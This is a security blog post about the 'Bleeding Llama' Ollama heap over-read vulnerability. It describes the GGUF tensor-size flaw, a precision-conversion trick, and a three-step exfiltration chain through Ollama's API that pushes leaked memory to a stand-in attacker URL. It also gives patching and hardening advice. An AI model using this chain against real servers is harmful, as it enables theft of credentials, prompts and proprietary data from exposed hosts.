Bleeding Llama: Why 300,000 Private AI Servers Are Blabbing Their Secrets

Intro

SOCFortress

~5 min read · May 7, 2026 (Updated: May 7, 2026) · Free: Yes

Intro

In the race to adopt artificial intelligence, many users have turned to Ollama as a "privacy shield." By running Large Language Models (LLMs) like Llama 3 locally, organizations aim to keep their sensitive data away from the cloud-based eyes of Big Tech. It is a relatable scenario: download the software, pull a model, and enjoy the security of a private, air-gapped-style environment.

However, a critical vulnerability has turned this privacy promise into a sieve. Dubbed "Bleeding Llama" (CVE-2026–7482) and carrying a massive CVSS score of 9.3, this heap out-of-bounds read vulnerability allows unauthenticated attackers to peer into the inner workings of a server's memory. What was meant to be a secure local vault is now, in many cases, an open window.

The scale of the problem is staggering. Nearly 300,000 servers globally are currently exposed, potentially leaking the very secrets they were installed to protect.

When Performance Trumps Safety

Ollama is written in Go, a programming language often praised for its built-in memory safety. In a typical Go environment, an attempt to read memory outside of an assigned buffer would cause the program to "panic" and crash rather than leak data. This creates a dangerous false sense of security for developers who assume the language itself prevents these types of bugs.

The "Bleeding Llama" vulnerability exists because developers often trade safety for speed. To optimize AI performance, specifically within the GGUF parsing logic, the software utilizes an "escape hatch" to bypass Go's standard protections.

"The answer is the unsafe package. Go gives developers an escape hatch for low-level memory operations, and as the name suggests, all the usual safety guarantees go out the window. Unsurprisingly, the one place Ollama uses unsafe is exactly where this vulnerability lives."

The GGUF Validation Gap

The core of the vulnerability lies in how Ollama processes GGUF files, the standard format used to store and run local models. These files contain "tensors" — multi-dimensional arrays of numbers that act as the model's "brain." Because GGUF is a binary format, Ollama must parse the metadata to understand how to read the data inside.

The system failed to validate a critical field: the "tensor shape." An attacker can manually craft a GGUF file where they claim a tensor is massive — for instance, 1 million elements — while the actual data provided in the file is tiny. Because the system doesn't verify this claim, it blindly follows the instructions, reading past the end of the buffer and into the system's heap memory.

To ensure the stolen data isn't corrupted during this process, attackers use a clever "lossless conversion" trick. By setting the source tensor type to F16 and requesting an F32 target format, the attacker ensures the heap data remains perfectly readable. F16 to F32 is a lossless mathematical transition, meaning the sensitive memory lands on the attacker's disk exactly as it existed in the server's RAM.

The Bottom Line: Ollama's failure to validate declared tensor sizes against actual file lengths allows a crafted GGUF to "over-read" the heap, while a specific precision-conversion trick keeps the stolen data intact and readable.

A 3-Step Path to Exfiltration

Finding a way to read memory is one thing; getting that data off a secured server is another. Attackers have discovered a surprisingly efficient three-step process to exfiltrate leaked data using Ollama's own built-in features — all without needing a single password.

Staging the Malicious File: The attacker uploads a crafted, malicious GGUF file to the server via the /api/blobs endpoint.
Triggering the Out-of-Bounds Read: Using the /api/create endpoint, the attacker forces the server to process the file. This triggers the read of the heap memory, which is then bundled into a "new" model file stored on the server.
Exploiting the URI Parser: The attacker calls the /api/push endpoint. By exploiting a lack of validation, the attacker sets the model name to an HTTP URI (e.g., http://attacker-server.com/stolen_data). Ollama's parser treats this URI as the destination and happily uploads the model—and the stolen heap secrets—directly to the attacker.

Crucially, because Ollama lacks default authentication, an attacker can execute these steps with no credentials whatsoever. They don't need to be on your network; they just need your IP address.

Stealing the Keys to the Kingdom

When we think of a "memory leak," we often think of recent chat logs. While user prompts are certainly at risk, the "Bleeding Llama" leak is much more invasive. Research has shown that the heap memory often contains environment variables, system prompts, and even sensitive API keys or tokens used by the host machine.

The risk increases significantly for developers using modern AI agent tools like Claude Code. When these tools are connected to a vulnerable Ollama server, the outputs from various local tools — which might include proprietary code, database schemas, or internal configurations — also flow through the heap memory.

This means an attacker isn't just reading your conversation with a chatbot. They are potentially harvesting the environment variables and tool outputs that form the backbone of your entire development infrastructure.

The 0.0.0.0 Dilemma: 300,000 Open Windows

The reach of this vulnerability represents a systemic risk for the enterprise. Ollama has recorded over 100 million downloads on Docker Hub and has roughly 170,000 stars on GitHub, marking it as the industry standard for local AI.

The primary driver of this risk is the software's default configuration. By default, Ollama listens on all network interfaces (0.0.0.0) and requires no authentication. This "plug-and-play" ease of use has resulted in 300,000 servers sitting on the public internet, ready to be queried and drained by anyone with an internet connection.

A Timeline of Urgency

The path from discovery to a fix was marked by significant friction between security researchers and the authorities responsible for documenting these risks.

February 2, 2026: Vulnerability first reported to Ollama.
February 25, 2026: Ollama acknowledged the bug but requested researchers submit the CVE independently.
February 26, 2026: Researchers issued an urgent warning: releasing a fix without a public security advisory would leave users unaware of the danger, essentially providing a roadmap for attackers while leaving defenders in the dark.
March — April 2026: Delays with MITRE forced researchers to seek a third-party authority (Echo) to assign the CVE.
May 1, 2026: CVE-2026–7482 was finally published to the world.

Closing: The Road to AI Readiness

The "Bleeding Llama" vulnerability serves as a stark reminder that "local" does not automatically mean "secure." For organizations to safely integrate AI, they must move beyond default configurations. Immediate remediation requires updating to Ollama version 0.17.1 or higher.

Beyond patching, the roadmap to AI readiness must include network segmentation and the use of authentication proxies or firewalls to shield these servers from the public web. Simply put, if your AI server is listening to the whole world without a password, you aren't running a private service; you're running a data-leak-as-a-service.

As we race to integrate local AI for privacy, are we inadvertently building the most efficient data-exfiltration machines the world has ever seen?

#ollama #cybersecurity #vulnerability #threat-intelligence

< Go to the original

Bleeding Llama: Why 300,000 Private AI Servers Are Blabbing Their Secrets

Intro

Intro

When Performance Trumps Safety

The GGUF Validation Gap

A 3-Step Path to Exfiltration

Stealing the Keys to the Kingdom

The 0.0.0.0 Dilemma: 300,000 Open Windows

A Timeline of Urgency

Closing: The Road to AI Readiness

Reporting a Problem